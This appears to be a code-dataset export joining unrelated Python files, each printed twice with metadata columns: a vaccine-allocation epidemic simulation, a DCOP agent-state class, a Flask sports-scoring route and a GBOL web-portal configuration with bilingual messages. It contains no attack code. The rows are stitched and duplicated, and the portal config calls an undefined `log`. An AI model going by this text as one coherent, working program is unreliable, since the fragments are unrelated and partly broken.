Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
| import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
| en | 0.571926 | # distribute historical doses assuming mortality prioritization # try: # process(t) # except Exception as e: # failures.append((e, t)) | 2.161285 | 2 |
src/core/agent_state.py | nandofioretto/py_dcop | 4 | 9134 | '''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i] | '''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i] | en | 0.833537 | Every agent has an agent state, which is its local view of the world # contains the variable assignment (exploreD) for this agent and its neighbors ## Data structures to explore assignment local to an agent # the iterator to all possible assignment for this agent # All possible assignments for the variables of this agent If a next assignment for the agent local variables exists, then assign it :var self.variables_assignments and return True. Otherwise return False. # Reset iterator | 3.237484 | 3 |
johnny_cache/__init__.py | Sonictherocketman/cache-proxy | 3 | 9135 | from .server import app # noqa
| from .server import app # noqa
| none | 1 | 1.095316 | 1 |
|
python_packages_static/flopy/mf6/__init__.py | usgs/neversink_workflow | 351 | 9136 | <gh_stars>100-1000
# imports
from . import coordinates
from . import data
from .modflow import *
from . import utils
from .data import mfdatascalar, mfdatalist, mfdataarray
from .mfmodel import MFModel
from .mfbase import ExtFileAction
| # imports
from . import coordinates
from . import data
from .modflow import *
from . import utils
from .data import mfdatascalar, mfdatalist, mfdataarray
from .mfmodel import MFModel
from .mfbase import ExtFileAction | none | 1 | 1.042753 | 1 |
|
tests/__init__.py | issuu/jmespath | 0 | 9137 | <gh_stars>0
import sys
# The unittest module got a significant overhaul
# in 2.7, so if we're in 2.6 we can use the backported
# version unittest2.
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
import simplejson as json
from ordereddict import OrderedDict
else:
import unittest
import json
from collections import OrderedDict
| import sys
# The unittest module got a significant overhaul
# in 2.7, so if we're in 2.6 we can use the backported
# version unittest2.
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
import simplejson as json
from ordereddict import OrderedDict
else:
import unittest
import json
from collections import OrderedDict | en | 0.612497 | # The unittest module got a significant overhaul # in 2.7, so if we're in 2.6 we can use the backported # version unittest2. | 2.237035 | 2 |
src/routes/scoring.py | jtillman20/cfb-data-api | 0 | 9138 | <filename>src/routes/scoring.py
from typing import Union
from flask import request
from flask_restful import Resource
from exceptions import InvalidRequestError
from models import Scoring
from utils import flask_response, rank, sort
class ScoringRoute(Resource):
@flask_response
def get(self, side_of_ball: str) -> Union[Scoring, list[Scoring]]:
"""
GET request to get scoring offense or defense for the given years.
If team is provided only get scoring data for that team.
Args:
side_of_ball (str): Offense or defense
Returns:
Union[Scoring, list[Scoring]]: Scoring data for all teams
or only scoring data for one team
"""
if side_of_ball not in ['offense', 'defense']:
raise InvalidRequestError(
"Side of ball must be either 'offense' or 'defense'")
sort_attr = request.args.get('sort', 'points_per_game')
secondary_attr, secondary_reverse = secondary_sort(
attr=sort_attr, side_of_ball=side_of_ball)
try:
start_year = int(request.args['start_year'])
except KeyError:
raise InvalidRequestError(
'Start year is a required query parameter')
except ValueError:
raise InvalidRequestError(
'Query parameter start year must be an integer')
end_year = request.args.get('end_year')
team = request.args.get('team')
if end_year is not None:
try:
end_year = int(end_year)
except ValueError:
raise InvalidRequestError(
'Query parameter end year must be an integer')
scoring = Scoring.get_scoring(
side_of_ball=side_of_ball,
start_year=start_year,
end_year=end_year,
team=team
)
if isinstance(scoring, Scoring):
return scoring
attrs = [secondary_attr, sort_attr]
reverses = [secondary_reverse, side_of_ball == 'offense']
scoring = sort(data=scoring, attrs=attrs, reverses=reverses)
return rank(data=scoring, attr=sort_attr)
def secondary_sort(attr: str, side_of_ball: str) -> tuple:
"""
Determine the secondary sort attribute and order when the
primary sort attribute has the same value.
Args:
attr (str): The primary sort attribute
side_of_ball (str): Offense or defense
Returns:
tuple: Secondary sort attribute and sort order
"""
if attr == 'points_per_game':
secondary_attr = 'games'
elif attr in ['points', 'relative_points_per_game']:
secondary_attr = 'points_per_game'
else:
secondary_attr = attr
return secondary_attr, side_of_ball == 'offense'
| <filename>src/routes/scoring.py
from typing import Union
from flask import request
from flask_restful import Resource
from exceptions import InvalidRequestError
from models import Scoring
from utils import flask_response, rank, sort
class ScoringRoute(Resource):
@flask_response
def get(self, side_of_ball: str) -> Union[Scoring, list[Scoring]]:
"""
GET request to get scoring offense or defense for the given years.
If team is provided only get scoring data for that team.
Args:
side_of_ball (str): Offense or defense
Returns:
Union[Scoring, list[Scoring]]: Scoring data for all teams
or only scoring data for one team
"""
if side_of_ball not in ['offense', 'defense']:
raise InvalidRequestError(
"Side of ball must be either 'offense' or 'defense'")
sort_attr = request.args.get('sort', 'points_per_game')
secondary_attr, secondary_reverse = secondary_sort(
attr=sort_attr, side_of_ball=side_of_ball)
try:
start_year = int(request.args['start_year'])
except KeyError:
raise InvalidRequestError(
'Start year is a required query parameter')
except ValueError:
raise InvalidRequestError(
'Query parameter start year must be an integer')
end_year = request.args.get('end_year')
team = request.args.get('team')
if end_year is not None:
try:
end_year = int(end_year)
except ValueError:
raise InvalidRequestError(
'Query parameter end year must be an integer')
scoring = Scoring.get_scoring(
side_of_ball=side_of_ball,
start_year=start_year,
end_year=end_year,
team=team
)
if isinstance(scoring, Scoring):
return scoring
attrs = [secondary_attr, sort_attr]
reverses = [secondary_reverse, side_of_ball == 'offense']
scoring = sort(data=scoring, attrs=attrs, reverses=reverses)
return rank(data=scoring, attr=sort_attr)
def secondary_sort(attr: str, side_of_ball: str) -> tuple:
"""
Determine the secondary sort attribute and order when the
primary sort attribute has the same value.
Args:
attr (str): The primary sort attribute
side_of_ball (str): Offense or defense
Returns:
tuple: Secondary sort attribute and sort order
"""
if attr == 'points_per_game':
secondary_attr = 'games'
elif attr in ['points', 'relative_points_per_game']:
secondary_attr = 'points_per_game'
else:
secondary_attr = attr
return secondary_attr, side_of_ball == 'offense'
| en | 0.748482 | GET request to get scoring offense or defense for the given years. If team is provided only get scoring data for that team. Args: side_of_ball (str): Offense or defense Returns: Union[Scoring, list[Scoring]]: Scoring data for all teams or only scoring data for one team Determine the secondary sort attribute and order when the primary sort attribute has the same value. Args: attr (str): The primary sort attribute side_of_ball (str): Offense or defense Returns: tuple: Secondary sort attribute and sort order | 3.122627 | 3 |
WebPortal/gbol_portal/vars.py | ZFMK/GermanBarcodeofLife | 0 | 9139 | import configparser
c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
"Schleswig-Holstein",
"Thüringen"],
'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'Send mail was successful!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
'Benachichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
'We have received Your registration for the taxonomic expertise {3} and '
'have send them to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
'en': 'The password and further tips werde sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
'en': 'An error occured when uploading the collection sheet. Please sent it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now login into the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Best regards,
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages are send to the dev_group specified in production.ini
messages['error'] = {}
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Trasaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| import configparser
c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
"Schleswig-Holstein",
"Thüringen"],
